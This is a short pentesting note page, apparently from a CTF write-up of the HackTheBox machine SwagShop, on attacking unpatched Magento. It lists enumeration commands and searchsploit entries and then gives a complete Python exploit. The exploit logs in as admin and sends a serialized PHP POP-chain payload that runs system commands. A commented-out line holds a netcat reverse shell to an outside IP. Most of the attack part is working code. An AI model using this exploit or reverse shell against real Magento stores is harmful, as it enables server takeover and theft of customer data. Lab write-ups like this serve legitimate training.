Magento
Magento is an ecommerce website which allows users to create and showcase their products
Enumeration
The magescan is an automated tool which is like wpscan checks for basic config locations - here
php magescan.phar scan:all http://swagshop.htb
Exploits
When the magento is not patched with SUPEE-5344 and of the version 1.9.1.0 CE / 1.14.1.0 EE (which will be enumerated by megascan)
We can perform remote code execution
searchsploit -x 37977
The exploit creates a admin account in the megento application which we can use it to perform RCE as authenticated user
searchsploit -x 37811
The python3 version of 37811 is below and worked fine for swagshop htb
#!/usr/bin/env python3
from hashlib import md5
import sys
import re
import base64
import requests
from pwn import log
username = "forme"
password = "forme"
url = "http://swagshop.htb/index.php/admin"
proxy = {"http" :"http://localhost:8080"}
data = {"login[username]" : username,
"login[password]" : password}
#arg = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 443 >/tmp/f'
arg = "whoami"
php_function = 'system' # Note: we can only pass 1 argument to the function
install_date = b'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml
# POP chain to pivot into call_user_exec
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
'\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
'_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
len(arg), arg)
# session
log.info("Initializing the session")
session = requests.Session()
# Loign Successful
r = session.post(url=url, data=data, proxies=proxy)
if r.status_code == 200:
log.success("Logged in as admin...")
else:
log.error("Failed to login")
burl = re.search("ajaxBlockUrl = \'(.*)\'", r.text)
burl = burl.group(1)
# print(burl) # identifies block url and key
key = re.search("var FORM_KEY = '(.*)'", r.text)
key = key.group(1)
# print(key)
log.info("Identified block url and key")
dn = session.get(burl + 'block/tab_orders/period/1y/?isAjax=true', data='isAjax=false&form_key=' + key)
tunnel = re.search("src=\"(.*)\?ga=", dn.text)
tunnel = bytes(tunnel.group(1), 'utf-8')
payload = base64.b64encode(bytes(payload, 'utf-8'))
gh = bytes(md5(payload + install_date).hexdigest(), 'utf-8')
exploit = tunnel + b'?ga=' + payload + b'&h=' + gh
log.info("Exploit constructed")
test_ = exploit.decode()
test = session.get(url=test_)
log.success("Successfully exploited...")
print(test.text)
Machine:
Swagshop - HTB
Last updated
Was this helpful?